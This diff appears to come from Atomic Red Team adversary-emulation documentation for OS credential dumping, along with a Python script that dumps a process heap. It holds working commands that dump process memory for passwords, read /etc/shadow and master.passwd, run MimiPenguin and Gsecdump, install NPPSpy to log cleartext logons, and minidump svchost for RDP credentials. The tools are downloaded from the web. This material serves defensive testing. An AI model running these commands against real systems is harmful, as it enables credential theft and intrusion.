-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

 ```sh
 sh #{script_path}
@@ -58,56 +47,49 @@ dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM
 grep -i "PASS" "#{output_file}"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm -f "#{output_file}"
 ```

+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: Script to launch target process must exist
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 test -f #{script_path}
 grep "#{pid_term}" #{script_path}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 echo '#!/bin/sh' > #{script_path}
 echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
 ```

+### Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local)

-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Dump individual process memory with sh on FreeBSD (Local)
 Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
 copy process memory to an external file so it can be searched or exfiltrated later.
 On FreeBSD procfs must be mounted.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `fa37b633-e097-4415-b2b8-c5bf4c86e423`

-**auto_generated_guid:** fa37b633-e097-4415-b2b8-c5bf4c86e423
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | path | /tmp/T1003.007.bin|
 | script_path | Path to script generating the target process | path | /tmp/T1003.007.sh|
 | pid_term | Unique string to use to identify target process | string | T1003.007|

-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

 ```sh
 sh #{script_path}
@@ -119,47 +101,42 @@ dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM
 strings "#{output_file}" | grep -i PASS
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm -f "#{output_file}"
 ```

+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: Script to launch target process must exist
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 test -f #{script_path}
 grep "#{pid_term}" #{script_path}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 echo '#!/bin/sh' > #{script_path}
 echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
 ```

+### Atomic Test #3: Dump individual process memory with Python (Local)

-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Dump individual process memory with Python (Local)
 Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
 copy a process's heap memory to an external file so it can be searched or exfiltrated later.
 On FreeBSD procfs must be mounted.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `437b2003-a20d-4ed8-834c-4964f24eec63`

-**auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | path | /tmp/T1003.007.bin|
@@ -167,9 +144,7 @@ On FreeBSD procfs must be mounted.
 | python_script | Path to script generating the target process | path | PathToAtomicsFolder/T1003.007/src/dump_heap.py|
 | pid_term | Unique string to use to identify target process | string | T1003.007|

-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

 ```sh
 sh #{script_path}
@@ -179,42 +154,46 @@ $PYTHON #{python_script} $PID #{output_file}
 grep -i "PASS" "#{output_file}"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm -f "#{output_file}"
 ```

+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: Script to launch target process must exist
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 test -f #{script_path}
 grep "#{pid_term}" #{script_path}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 echo '#!/bin/sh' > #{script_path}
 echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
 ```
+
 ##### Description: Requires Python
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 (which python || which python3 || which python2)
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 echo "Python 2.7+ or 3.4+ must be installed"
 ```

+### Atomic Test #4: Capture Passwords with MimiPenguin

-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Capture Passwords with MimiPenguin
 MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). 
 Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. 
 See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. 
@@ -222,76 +201,85 @@ See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:

 **Supported Platforms:** Linux

+**auto_generated_guid:** `a27418de-bdce-4ebd-b655-38f04842bf0c`

-**auto_generated_guid:** a27418de-bdce-4ebd-b655-38f04842bf0c
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | path | /tmp/T1003.007Test3.txt|
 | MimiPenguin_Location | Path of MimiPenguin script | path | /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh|

-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)

 ```bash
 sudo #{MimiPenguin_Location} > #{output_file}
 cat #{output_file}
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```bash
 rm -f #{output_file} > /dev/null
 ```

+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
 mkdir /tmp/mimipenguin
 tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
 ```
+
 ##### Description: Strings must be installed
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 sudo apt-get -y install binutils
 ```
+
 ##### Description: Python2 must be installed
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 sudo apt-get -y install python2
 ```
+
 ##### Description: Libc-bin must be installed
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 sudo apt-get -y install libc-bin
 ```

-
-
-
-<br/>
@@ -1,21 +1,16 @@
 #!/usr/bin/env python
 '''Dump a process's heap space to disk
-
 Usage:
    python dump_proc.py <PID> <filepath>
 '''
 import argparse
 import platform
-
-
 parser = argparse.ArgumentParser(description='Dump a process\'s heap space to disk')
 parser.add_argument('pid', type=int, help='ID of process to dump')
 parser.add_argument('filepath', help='A filepath to save output to')
 args = parser.parse_args()
-
 process_id = args.pid
 output_file = args.filepath
-
 if platform.system() == "Linux":
  with open("/proc/{}/maps".format(process_id), "r") as maps_file:
      # example: 5566db1a6000-5566db4f0000 rw-p 00000000 00:00 0    [heap]
@@ -25,16 +20,24 @@ if platform.system() == "Linux":
      mem_stop = int(heap_range.split('-')[1], 16)
      mem_size = mem_stop - mem_start
 elif platform.system() == "FreeBSD":
-  import linecache
-  mem_line = linecache.getline("/proc/"+str(process_id)+"/map",4)
-  mem_start = int(mem_line.split(' ')[0], 16)
-  mem_stop = int(mem_line.split(' ')[1], 16)
+  import subprocess
+  procstat_output = subprocess.check_output(["procstat", "-v", str(process_id)], universal_newlines=True)
+  heap_line = None
+  for line in procstat_output.splitlines():
+      if "rw-" in line and "sw" in line:
+          heap_line = line
+          break
+  if not heap_line:
+      for line in procstat_output.splitlines():
+          if "rw-" in line and not (".so" in line or "/lib/" in line):
+              heap_line = line
+              break
+  columns = heap_line.split()
+  mem_start = int(columns[1], 16)
+  mem_stop = int(columns[2], 16)
  mem_size = mem_stop - mem_start
-  mem_start = mem_stop
-
 with open("/proc/{}/mem".format(process_id), "rb") as mem_file:
    mem_file.seek(mem_start, 0)
    heap_mem = mem_file.read(mem_size)
-
 with open(output_file, "wb") as ofile:
    ofile.write(heap_mem)
@@ -1,202 +1,142 @@
 # T1003.008 - OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/008)
-<blockquote>

-Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information, including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
+## Description from ATT&CK

-Linux stores user information such as user ID, group ID, home directory path, and login shell in <code>/etc/passwd</code>. A "user" on the system may belong to a person or a service. All password hashes are stored in <code>/etc/shadow</code> - including entries for users with no passwords and users with locked or disabled accounts.(Citation: Linux Password and Shadow File Formats)
+> Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information, including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
+> 
+> Linux stores user information such as user ID, group ID, home directory path, and login shell in <code>/etc/passwd</code>. A "user" on the system may belong to a person or a service. All password hashes are stored in <code>/etc/shadow</code> - including entries for users with no passwords and users with locked or disabled accounts.(Citation: Linux Password and Shadow File Formats)
+> 
+> Adversaries may attempt to read or dump the <code>/etc/passwd</code> and <code>/etc/shadow</code> files on Linux systems via command line utilities such as the <code>cat</code> command.(Citation: Arctic Wolf) Additionally, the Linux utility <code>unshadow</code> can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper - for example, via the command <code>/usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>(Citation: nixCraft - John the Ripper). Since the user information stored in <code>/etc/passwd</code> are linked to the password hashes in <code>/etc/shadow</code>, an adversary would need to have access to both.

-Adversaries may attempt to read or dump the <code>/etc/passwd</code> and <code>/etc/shadow</code> files on Linux systems via command line utilities such as the <code>cat</code> command.(Citation: Arctic Wolf) Additionally, the Linux utility <code>unshadow</code> can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper - for example, via the command <code>/usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>(Citation: nixCraft - John the Ripper). Since the user information stored in <code>/etc/passwd</code> are linked to the password hashes in <code>/etc/shadow</code>, an adversary would need to have access to both.
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1003/008)

 ## Atomic Tests

- [Atomic Test #1 - Access /etc/shadow (Local)](#atomic-test-1---access-etcshadow-local)
+- [Atomic Test #1: Access /etc/shadow (Local)](#atomic-test-1-access-etcshadow-local)
+- [Atomic Test #2: Access /etc/master.passwd (Local)](#atomic-test-2-access-etcmasterpasswd-local)
+- [Atomic Test #3: Access /etc/passwd (Local)](#atomic-test-3-access-etcpasswd-local)
+- [Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat](#atomic-test-4-access-etcshadowpasswdmasterpasswd-with-a-standard-bin-thats-not-cat)
+- [Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins](#atomic-test-5-access-etcshadowpasswdmasterpasswd-with-shell-builtins)

- [Atomic Test #2 - Access /etc/master.passwd (Local)](#atomic-test-2---access-etcmasterpasswd-local)
+### Atomic Test #1: Access /etc/shadow (Local)

- [Atomic Test #3 - Access /etc/passwd (Local)](#atomic-test-3---access-etcpasswd-local)
-
- [Atomic Test #4 - Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat](#atomic-test-4---access-etcshadowpasswdmasterpasswd-with-a-standard-bin-thats-not-cat)
-
- [Atomic Test #5 - Access /etc/{shadow,passwd,master.passwd} with shell builtins](#atomic-test-5---access-etcshadowpasswdmasterpasswd-with-shell-builtins)
-
-
-<br/>
-
-## Atomic Test #1 - Access /etc/shadow (Local)
 /etc/shadow file is accessed in Linux environments

 **Supported Platforms:** Linux

+**auto_generated_guid:** `3723ab77-c546-403c-8fb4-bb577033b235`

-**auto_generated_guid:** 3723ab77-c546-403c-8fb4-bb577033b235
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|

-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)

 ```bash
 sudo cat /etc/shadow > #{output_file}
 cat #{output_file}
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```bash
 rm -f #{output_file}
 ```
+### Atomic Test #2: Access /etc/master.passwd (Local)

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Access /etc/master.passwd (Local)
 /etc/master.passwd file is accessed in FreeBSD environments

 **Supported Platforms:** Linux

+**auto_generated_guid:** `5076874f-a8e6-4077-8ace-9e5ab54114a5`

-**auto_generated_guid:** 5076874f-a8e6-4077-8ace-9e5ab54114a5
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|

-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

 ```sh
 sudo cat /etc/master.passwd > #{output_file}
 cat #{output_file}
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm -f #{output_file}
 ```
+### Atomic Test #3: Access /etc/passwd (Local)

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Access /etc/passwd (Local)
 /etc/passwd file is accessed in FreeBSD and Linux environments

 **Supported Platforms:** Linux

+**auto_generated_guid:** `60e860b6-8ae6-49db-ad07-5e73edd88f5d`

-**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|

-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 cat /etc/passwd > #{output_file}
 cat #{output_file}
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm -f #{output_file}
 ```
+### Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat
 Dump /etc/passwd, /etc/master.passwd and /etc/shadow using ed

 **Supported Platforms:** Linux

+**auto_generated_guid:** `df1a55ae-019d-4120-bc35-94f4bc5c4b0a`

-**auto_generated_guid:** df1a55ae-019d-4120-bc35-94f4bc5c4b0a
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|

-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

 ```sh
 unamestr=$(uname)
 if [ "$unamestr" = 'Linux' ]; then echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}; elif [ "$unamestr" = 'FreeBSD' ]; then echo -e "e /etc/passwd\n,p\ne /etc/master.passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}; fi
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm -f #{output_file}
 ```
+### Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Access /etc/{shadow,passwd,master.passwd} with shell builtins
 Dump /etc/passwd, /etc/master.passwd and /etc/shadow using sh builtins

 **Supported Platforms:** Linux

+**auto_generated_guid:** `f5aa6543-6cb2-4fae-b9c2-b96e14721713`

-**auto_generated_guid:** f5aa6543-6cb2-4fae-b9c2-b96e14721713
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|

-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

 ```sh
 testcat(){ (while read line; do echo $line >> #{output_file}; done < $1) }
@@ -205,13 +145,8 @@ testcat /etc/passwd
 testcat /etc/shadow
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm -f #{output_file}
 ```
-
-
-
-
-
-<br/>
@@ -1,34 +1,25 @@
 # T1003 - OS Credential Dumping
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003)
-<blockquote>

-Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
+## Description from ATT&CK

-Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
+> Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
+> 
+> Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.

-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1003)

 ## Atomic Tests

- [Atomic Test #1 - Gsecdump](#atomic-test-1---gsecdump)
+- [Atomic Test #1: Gsecdump](#atomic-test-1-gsecdump)
+- [Atomic Test #2: Credential Dumping with NPPSpy](#atomic-test-2-credential-dumping-with-nppspy)
+- [Atomic Test #3: Dump svchost.exe to gather RDP credentials](#atomic-test-3-dump-svchostexe-to-gather-rdp-credentials)
+- [Atomic Test #4: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)](#atomic-test-4-retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-list)
+- [Atomic Test #5: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)](#atomic-test-5-retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-config)
+- [Atomic Test #6: Dump Credential Manager using keymgr.dll and rundll32.exe](#atomic-test-6-dump-credential-manager-using-keymgrdll-and-rundll32exe)
+- [Atomic Test #7: Send NTLM Hash with RPC Test Connection](#atomic-test-7-send-ntlm-hash-with-rpc-test-connection)

- [Atomic Test #2 - Credential Dumping with NPPSpy](#atomic-test-2---credential-dumping-with-nppspy)
+### Atomic Test #1: Gsecdump

- [Atomic Test #3 - Dump svchost.exe to gather RDP credentials](#atomic-test-3---dump-svchostexe-to-gather-rdp-credentials)
-
- [Atomic Test #4 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)](#atomic-test-4---retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-list)
-
- [Atomic Test #5 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)](#atomic-test-5---retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-config)
-
- [Atomic Test #6 - Dump Credential Manager using keymgr.dll and rundll32.exe](#atomic-test-6---dump-credential-manager-using-keymgrdll-and-rundll32exe)
-
- [Atomic Test #7 - Send NTLM Hash with RPC Test Connection](#atomic-test-7---send-ntlm-hash-with-rpc-test-connection)
-
-
-<br/>
-
-## Atomic Test #1 - Gsecdump
 Dump credentials from memory using Gsecdump.

 Upon successful execution, you should see domain\username's followed by two 32 character hashes.
@@ -40,38 +31,35 @@ If you see a message saying "The system cannot find the path specified", try usi

 **Supported Platforms:** Windows

+**auto_generated_guid:** `96345bfc-8ae7-4b6a-80b7-223200f24ef9`

-**auto_generated_guid:** 96345bfc-8ae7-4b6a-80b7-223200f24ef9
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | gsecdump_exe | Path to the Gsecdump executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;gsecdump.exe|
 | gsecdump_bin_hash | File hash of the Gsecdump binary file | string | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC|
 | gsecdump_url | Path to download Gsecdump binary file | url | https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 "#{gsecdump_exe}" -a
 ```


+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "#{gsecdump_exe}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
@@ -81,13 +69,8 @@ if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}
 }
 ```

+### Atomic Test #2: Credential Dumping with NPPSpy

-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Credential Dumping with NPPSpy
 Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy.
 After user's logging in cleartext password is saved in C:\NPPSpy.txt.
 Clean up deletes the files and reverses Registry changes.
@@ -95,16 +78,9 @@ NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NP

 **Supported Platforms:** Windows

+**auto_generated_guid:** `9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6`

-**auto_generated_guid:** 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
@@ -119,7 +95,8 @@ $rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\Netw
 echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 $cleanupPath = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
 $cleanupUpdatedValue = $cleanupPath.PROVIDERORDER 
@@ -130,28 +107,26 @@ Remove-Item C:\NPPSpy.txt -ErrorAction Ignore
 Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: NPPSpy.dll must be available in ExternalPayloads directory
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
 Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll"
 ```

+### Atomic Test #3: Dump svchost.exe to gather RDP credentials

-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Dump svchost.exe to gather RDP credentials
 The svchost.exe contains the RDP plain-text credentials.
 Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/

@@ -159,16 +134,9 @@ Upon successful execution, you should see the following file created $env:TEMP\s

 **Supported Platforms:** Windows

+**auto_generated_guid:** `d400090a-d8ca-4be0-982e-c70598a23de9`

-**auto_generated_guid:** d400090a-d8ca-4be0-982e-c70598a23de9
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 $ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
@@ -176,34 +144,21 @@ if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
 C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
 ```
+### Atomic Test #4: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
 AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
 [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)

 **Supported Platforms:** Windows

+**auto_generated_guid:** `6c7a4fd3-5b0b-4b30-a93e-39411b25d889`

-**auto_generated_guid:** 6c7a4fd3-5b0b-4b30-a93e-39411b25d889
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
@@ -212,125 +167,88 @@ C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
 ```


+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: IIS must be installed prior to running the test
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 Install-WindowsFeature -name Web-Server -IncludeManagementTools
 ```

+### Atomic Test #5: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)

-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
 AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
 [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)

 **Supported Platforms:** Windows

+**auto_generated_guid:** `42510244-5019-48fa-a0e5-66c3b76e6049`

-**auto_generated_guid:** 42510244-5019-48fa-a0e5-66c3b76e6049
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
 ```


+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: IIS must be installed prior to running the test
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 Install-WindowsFeature -name Web-Server -IncludeManagementTools
 ```

+### Atomic Test #6: Dump Credential Manager using keymgr.dll and rundll32.exe

-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Dump Credential Manager using keymgr.dll and rundll32.exe
